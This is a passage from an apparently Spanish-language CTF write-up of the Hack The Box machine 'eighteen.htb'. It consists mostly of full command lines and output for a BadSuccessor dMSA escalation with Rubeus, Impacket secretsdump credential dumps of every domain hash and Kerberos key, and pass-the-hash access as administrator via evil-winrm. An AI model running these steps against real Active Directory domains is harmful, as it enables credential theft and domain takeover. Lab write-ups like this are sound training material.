aes256_cts_hmac_sha1 </span></span><span class="line"><span class="cl"> Base64<span class="o">(</span>key<span class="o">)</span> : tR7f4Z725JOBPPo7AlhgQzf4xGCalMJ3J2ZLXRl+gpA<span class="o">=</span> </span></span><span class="line"><span class="cl"> Current Keys <span class="k">for</span> bad$: <span class="o">(</span>aes256_cts_hmac_sha1<span class="o">)</span> A6EE5020CCF2EFA61CA2E2C9AAD7C7D34FF80CED71C367E7894992FD74260E04 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Ticket written to ticket.kirbi </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PS C:<span class="se">\u</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Convertimos el ticket con <code>ticketConverter</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ impacket-ticketConverter ticket.kirbi output.ccache </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> converting kirbi to ccache... </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> <span class="k">done</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Utilizamos el ticket para ejecutar <code>secretsdump</code> y obtener el hash de administrator.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ <span class="nv">KRB5CCNAME</span><span class="o">=</span>output.ccache faketime <span class="s2">&#34;</span><span class="k">$(</span>ntpdate -q 240.0.0.1 <span class="p">|</span> cut -d <span class="s1">&#39; &#39;</span> -f 1,2<span class="k">)</span><span class="s2">&#34;</span> impacket-secretsdump eighteen.htb/bad<span class="se">\$</span>@dc01.eighteen.htb -k -no-pass -just-dc-ntlm -dc-ip 240.0.0.1 -target-ip 240.0.0.1 </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span>id:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649::: </span></span><span class="line"><span class="cl">mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>amie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>ane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>lice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\b</span>ob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\c</span>arol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\d</span>ave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9::: </span></span><span class="line"><span class="cl">DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584::: </span></span><span class="line"><span class="cl">bad$:12607:aad3b435b51404eeaad3b435b51404ee:4450d68bd2b3f724e3f1eb747718bb43::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h4 id="badsuccesor-commands-exploitation">BadSuccesor Commands Exploitation</h4> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># BadSuccessor commands</span> </span></span><span class="line"><span class="cl"><span class="c1"># Import Module</span> </span></span><span class="line"><span class="cl">Import-Module ./BadSuccessor.ps1 </span></span><span class="line"><span class="cl"><span class="c1"># Run in Exploitation mode with the OU, dMSA account, low user and privileged user</span> </span></span><span class="line"><span class="cl">BadSuccessor -mode exploit -Path <span class="s2">&#34;OU=Staff,DC=eighteen,DC=htb&#34;</span> -Name bad -DelegatedAdmin adam.scott -DelegateTarget Administrator -domain eighteen.htb </span></span><span class="line"><span class="cl"><span class="c1"># request a ticket for the low user</span> </span></span><span class="line"><span class="cl">./Rubeus2.3.exe asktgt /user:adam.scott /password:iloveyou1 /domain:eighteen.htb /dc:dc01.eighteen.htb /nowrap /opsec /force </span></span><span class="line"><span class="cl"><span class="c1"># request a ticket with the low user ticket for the dMSA account</span> </span></span><span class="line"><span class="cl">./Rubeus2.3.exe asktgs /targetuser:bad$ /service:krbtgt/eighteen.htb /opsec /dmsa /nowrap /ptt /outfile:ticket.kirbi /ticket:&lt;ticket&gt; </span></span><span class="line"><span class="cl"><span class="c1"># convert the ticket (kirbi)</span> </span></span><span class="line"><span class="cl">impacket-ticketConverter ticket.kirbi output.ccache </span></span><span class="line"><span class="cl"><span class="c1"># request ntlm hash for users via secretsdump</span> </span></span><span class="line"><span class="cl"><span class="nv">KRB5CCNAME</span><span class="o">=</span>output.ccache faketime <span class="s2">&#34;</span><span class="k">$(</span>ntpdate -q 240.0.0.1 <span class="p">|</span> cut -d <span class="s1">&#39; &#39;</span> -f 1,2<span class="k">)</span><span class="s2">&#34;</span> impacket-secretsdump eighteen.htb/bad<span class="se">\$</span>@dc01.eighteen.htb -k -no-pass -just-dc-ntlm -dc-ip 240.0.0.1 -target-ip 240.0.0.1 </span></span></code></pre></td></tr></table> </div> </div><h2 id="shell">Shell</h2> <p>Con el hash obtuvimos una nueva shell como administrador y realizamos la lectura de <code>root.txt</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ evil-winrm-py -i eighteen.htb -u administrator -H 0b133be956bfaddf9cea56701affddec </span></span><span class="line"><span class="cl"> _ _ _ </span></span><span class="line"><span class="cl"> _____ _<span class="o">(</span>_<span class="p">|</span> <span class="p">|</span>_____ __ _<span class="o">(</span>_<span class="o">)</span>_ _ _ _ _ __ ___ _ __ _ _ </span></span><span class="line"><span class="cl"> / -_<span class="se">\ </span>V <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>___<span class="se">\ </span>V V <span class="p">|</span> <span class="p">|</span> <span class="s1">&#39; \| &#39;</span>_<span class="p">|</span> <span class="s1">&#39; |___| &#39;</span>_ <span class="p">|</span> <span class="o">||</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="se">\_</span>__<span class="p">|</span><span class="se">\_</span>/<span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span> <span class="se">\_</span>/<span class="se">\_</span>/<span class="p">|</span>_<span class="p">|</span>_<span class="o">||</span>_<span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span>_<span class="p">|</span> <span class="p">|</span> .__/<span class="se">\_</span>, <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>__/ v1.5.0 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Connecting to <span class="s1">&#39;eighteen.htb:5985&#39;</span> as <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; whoami </span></span><span class="line"><span class="cl">eighteen<span class="se">\a</span>dministrator </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; cat ../Desktop/root.txt </span></span><span class="line"><span class="cl">47705a51646fd9cbf77c57f30a9a7f2a </span></span><span class="line"><span class="cl">evil-winrm-py PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; </span></span></code></pre></td></tr></table> </div> </div><h2 id="dump-hashes">Dump Hashes</h2> <p>Realizamos un dump de las hashes con <code>impacket-secretdumps</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ impacket-secretsdump administrator@dc01.eighteen.htb -hashes :0b133be956bfaddf9cea56701affddec -dc-ip 240.0.0.1 -target-ip 240.0.0.1 </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping <span class="nb">local</span> SAM hashes <span class="o">(</span>uid:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping cached domain logon information <span class="o">(</span>domain/username:hash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping LSA Secrets </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> <span class="nv">$MACHINE</span>.ACC </span></span><span class="line"><span class="cl">EIGHTEEN<span class="se">\D</span>C01$:aes256-cts-hmac-sha1-96:25d862a0f5cbe47c62167d4f57ef04d768965e76e1f8d18b4b95878b8a4fd028 </span></span><span class="line"><span class="cl">EIGHTEEN<span class="se">\D</span>C01$:aes128-cts-hmac-sha1-96:a4a8a36f0bf18ace2a587e5524a77843 </span></span><span class="line"><span class="cl">EIGHTEEN<span class="se">\D</span>C01$:des-cbc-md5:26618a9bc2b97302 </span></span><span class="line"><span class="cl">EIGHTEEN<span class="se">\D</span>C01$:plain_password_hex:4300770067007000580054005000520033004b005a0038004f00570069006200570074007900350032006f0048003300310054002b0031007a0070006b004b0039006d0037005400620052006b0074004800550051005200550063007200610074005600330072003500720057005a00580068005300360051006800770066004500360031006a0062006a00320063004b004c00320034007100520044003100740046007200320059002b0037004f0058002b0041004100370070004d003d0076006a006d006e004e007a00360042005200690067006400740037004d00350070006e0061006f00350079004300590038006a004c0068004c0069005500700047006d006a00470059006d00410068003800530049004e0046004d0072006b00670053006200790075007a003300620054006700660073004b006a00760048003900720030003300590046003200590035006c005a004d007900380076004b0079003500340037004200770058004c0067006f0054002b006e0065007300510037004a00700074003d003100410038005900750042007600490045007100640061006400760077004d0043006a00330047005700730043004d0038007a004f00730070004f006b004b0079004200690070004500360058006700760050005700480054004d004a00470073007200690056004f0065004e00420038004c006200 </span></span><span class="line"><span class="cl">EIGHTEEN<span class="se">\D</span>C01$:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> DPAPI_SYSTEM </span></span><span class="line"><span class="cl">dpapi_machinekey:0x48249fb0f4cf23ecbef54affc2b21d65717bf7df </span></span><span class="line"><span class="cl">dpapi_userkey:0xb8820f0412fc851cca8aa426248e7f37af5dd0b2 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> NL<span class="nv">$KM</span> </span></span><span class="line"><span class="cl"> <span class="m">0000</span> FA <span class="m">36</span> C7 D5 C0 <span class="m">82</span> AB B5 <span class="m">78</span> E1 <span class="m">17</span> F0 5E <span class="m">36</span> <span class="m">13</span> 5B .6......x...^6.<span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="m">0010</span> A5 9F C0 9C <span class="m">38</span> A8 C4 <span class="m">34</span> FE <span class="m">20</span> F7 2B D9 A2 8C AF ....8..4. .+.... </span></span><span class="line"><span class="cl"> <span class="m">0020</span> <span class="m">71</span> F2 E0 D2 <span class="m">09</span> A1 EC <span class="m">09</span> EB DE 9B 8C F5 4A E6 2D q............J.- </span></span><span class="line"><span class="cl"> <span class="m">0030</span> 6B 1D <span class="m">32</span> <span class="m">16</span> A2 ED B4 AE F1 <span class="m">51</span> AE 5B <span class="m">41</span> E5 4E B6 k.2......Q.<span class="o">[</span>A.N. </span></span><span class="line"><span class="cl">NL<span class="nv">$KM</span>:fa36c7d5c082abb578e117f05e36135ba59fc09c38a8c434fe20f72bd9a28caf71f2e0d209a1ec09ebde9b8cf54ae62d6b1d3216a2edb4aef151ae5b41e54eb6 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> _SC_MSSQLSERVER </span></span><span class="line"><span class="cl">EIGHTEEN<span class="se">\m</span>ssqlsvc:zOq3u4AKw5<span class="o">]</span>e </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> _SC_SQLSERVERAGENT </span></span><span class="line"><span class="cl">EIGHTEEN<span class="se">\m</span>ssqlsvc:!JpC319216bama </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span>id:rid:lmhash:nthash<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649::: </span></span><span class="line"><span class="cl">mssqlsvc:1601:aad3b435b51404eeaad3b435b51404ee:c44d16951b0810e8f3bbade300966ec4::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>amie.dunn:1606:aad3b435b51404eeaad3b435b51404ee:9fbaaf9e93e576187bb840e93971792a::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>ane.smith:1607:aad3b435b51404eeaad3b435b51404ee:42554e3213381f9d1787d2dbe6850d21::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>lice.jones:1608:aad3b435b51404eeaad3b435b51404ee:43f8a72420ee58573f6e4f453e72843a::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:1609:aad3b435b51404eeaad3b435b51404ee:9964dae494a77414e34aff4f34412166::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\b</span>ob.brown:1610:aad3b435b51404eeaad3b435b51404ee:7e86c41ddac3f95c986e0382239ab1ea::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\c</span>arol.white:1611:aad3b435b51404eeaad3b435b51404ee:6056d42866209a6744cb6294df075640::: </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\d</span>ave.green:1612:aad3b435b51404eeaad3b435b51404ee:7624e4baa9c950aa3e0f2c8b1df72ee9::: </span></span><span class="line"><span class="cl">DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584::: </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Kerberos keys grabbed </span></span><span class="line"><span class="cl">Administrator:0x14:977d41fb9cb35c5a28280a6458db3348ed1a14d09248918d182a9d3866809d7b </span></span><span class="line"><span class="cl">Administrator:0x13:5ebe190ad8b5efaaae5928226046dfc0 </span></span><span class="line"><span class="cl">Administrator:aes256-cts-hmac-sha1-96:1acd569d364cbf11302bfe05a42c4fa5a7794bab212d0cda92afb586193eaeb2 </span></span><span class="line"><span class="cl">Administrator:aes128-cts-hmac-sha1-96:7b6b4158f2b9356c021c2b35d000d55f </span></span><span class="line"><span class="cl">Administrator:0x17:0b133be956bfaddf9cea56701affddec </span></span><span class="line"><span class="cl">krbtgt:aes256-cts-hmac-sha1-96:56b1a6191645e0d5adf64a84418ecee5f79abe7c2109f3aeca08b1cc1381d024 </span></span><span class="line"><span class="cl">krbtgt:aes128-cts-hmac-sha1-96:5ad1b9baa9295bacca1286535e9efd8e </span></span><span class="line"><span class="cl">krbtgt:0x17:a7c7a912503b16d8402008c1aebdb649 </span></span><span class="line"><span class="cl">mssqlsvc:0x14:24746f3467856094de1b83e938136500911767a12d2d3b2e14105765d3d7cec9 </span></span><span class="line"><span class="cl">mssqlsvc:0x13:6ce61b6b5a08284c131ef7fbf4d85a00 </span></span><span class="line"><span class="cl">mssqlsvc:aes256-cts-hmac-sha1-96:d9ecd6b2a939ab8fe27dca49d889315cafdd6ebecc10cde4af7bfc653f9da607 </span></span><span class="line"><span class="cl">mssqlsvc:aes128-cts-hmac-sha1-96:76a931bfb4184ac5efae82263d95f215 </span></span><span class="line"><span class="cl">mssqlsvc:0x17:c44d16951b0810e8f3bbade300966ec4 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>amie.dunn:0x14:2c016f9a18c0026c29b71384e567a8ef39caba6171a003a8bbc2e1111645a813 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>amie.dunn:0x13:92f1fae2c11f9600f5b6181082214f0e </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>amie.dunn:aes256-cts-hmac-sha1-96:dbde889da88b5f07c7401663a953f54fdd6f414e54392101f1d9eb6a1c7679e7 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>amie.dunn:aes128-cts-hmac-sha1-96:7bd2a2b8ad4b67a8f6e933913f987d79 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>amie.dunn:0x17:9fbaaf9e93e576187bb840e93971792a </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>ane.smith:0x14:52481c342ea2b37e0712bfb0ab47cd6be9863bc9620df47e8e7c42cd0a683576 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>ane.smith:0x13:9e2e52016bd944eac3afe4a86cf41c5e </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>ane.smith:aes256-cts-hmac-sha1-96:584e2d51dfa5d24f593e06fc311410b5f71e4b80433141b7028bc523dac6bee0 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>ane.smith:aes128-cts-hmac-sha1-96:73fb572dc6d4375f8ceb1447b6906468 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\j</span>ane.smith:0x17:42554e3213381f9d1787d2dbe6850d21 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>lice.jones:0x14:349ce10e4b89ca16c1ac95f9d3d37d6e3a90f9ae8e4b598062a8774cf3dfbdda </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>lice.jones:0x13:a8172a1f22b6e1a2ab1343690fea1c7f </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>lice.jones:aes256-cts-hmac-sha1-96:ff947e4183a74a25c5a5cbc3a237d0c6f36ec9467efcfdaebf179acd5f67fe59 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>lice.jones:aes128-cts-hmac-sha1-96:24b72c652037857afe750f9c10bcc1a1 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>lice.jones:0x17:43f8a72420ee58573f6e4f453e72843a </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:0x14:ce816f93993d73cb234f5c9b73a60aa489f8f3079f6870fda146762962b55656 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:0x13:526a35452b9de155f780917b3a403506 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:aes256-cts-hmac-sha1-96:02f93f7e9e128c32449e2f20475afcdfb6cc2b4444ac8fd0b02406af018f75e5 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:aes128-cts-hmac-sha1-96:041716887b5efba3ba1dcddad9bbe98e </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:0x17:9964dae494a77414e34aff4f34412166 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\b</span>ob.brown:0x14:393e55b25bb1853b29979c980c19b6d0845fadb640eac609d1a85a563e7b06cf </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\b</span>ob.brown:0x13:1172eba897e9a70ae3619667c1831ca2 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\b</span>ob.brown:aes256-cts-hmac-sha1-96:718ebbe36922b7f48f6bfb964c68f142b94e26a1f55718847d20b4ef6e056538 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\b</span>ob.brown:aes128-cts-hmac-sha1-96:0eb1644648b1d905ce8042de351826c7 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\b</span>ob.brown:0x17:7e86c41ddac3f95c986e0382239ab1ea </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\c</span>arol.white:0x14:3b77670fed849cc244de4ccc7cafee944dea00e37570f16736b1108a246eada4 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\c</span>arol.white:0x13:7ef7b5d056f8251ffe901ebfd2543672 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\c</span>arol.white:aes256-cts-hmac-sha1-96:20a1f696ab33da115e5034c8087bbe86859ac10f6547a0545af0ca560190cb40 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\c</span>arol.white:aes128-cts-hmac-sha1-96:f28948aeb60d1552754c987b590d8428 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\c</span>arol.white:0x17:6056d42866209a6744cb6294df075640 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\d</span>ave.green:0x14:1f9cc062b18d3ffbbf786c27bf65cd9dff81d9ba8c4af5285741364c53437829 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\d</span>ave.green:0x13:68cb75c76f62ef851d01110d46346e38 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\d</span>ave.green:aes256-cts-hmac-sha1-96:15bea1d4b7740e14dd6b47c7734c19bb031874830e69f1cecac48d6fcc84cbf9 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\d</span>ave.green:aes128-cts-hmac-sha1-96:88d5e8df3683ab6bac2cfc2c40f022e8 </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\d</span>ave.green:0x17:7624e4baa9c950aa3e0f2c8b1df72ee9 </span></span><span class="line"><span class="cl">DC01$:0x14:14ad20e30aa3e8b21916121142c19fe88f15f2031af81806c58a24e38b06ace8 </span></span><span class="line"><span class="cl">DC01$:0x13:3ecd1e42aec8986642eaf7cb2ef5b7ec </span></span><span class="line"><span class="cl">DC01$:aes256-cts-hmac-sha1-96:25d862a0f5cbe47c62167d4f57ef04d768965e76e1f8d18b4b95878b8a4fd028 </span></span><span class="line"><span class="cl">DC01$:aes128-cts-hmac-sha1-96:a4a8a36f0bf18ace2a587e5524a77843 </span></span><span class="line"><span class="cl">DC01$:0x17:d79b6837ac78c51c79aab3d970875584 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> ClearText passwords grabbed </span></span><span class="line"><span class="cl">eighteen.htb<span class="se">\a</span>dam.scott:CLEARTEXT:iloveyou1 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Cleaning up... </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h2 id="cronjobs-cleanup">Cronjobs Cleanup</h2> 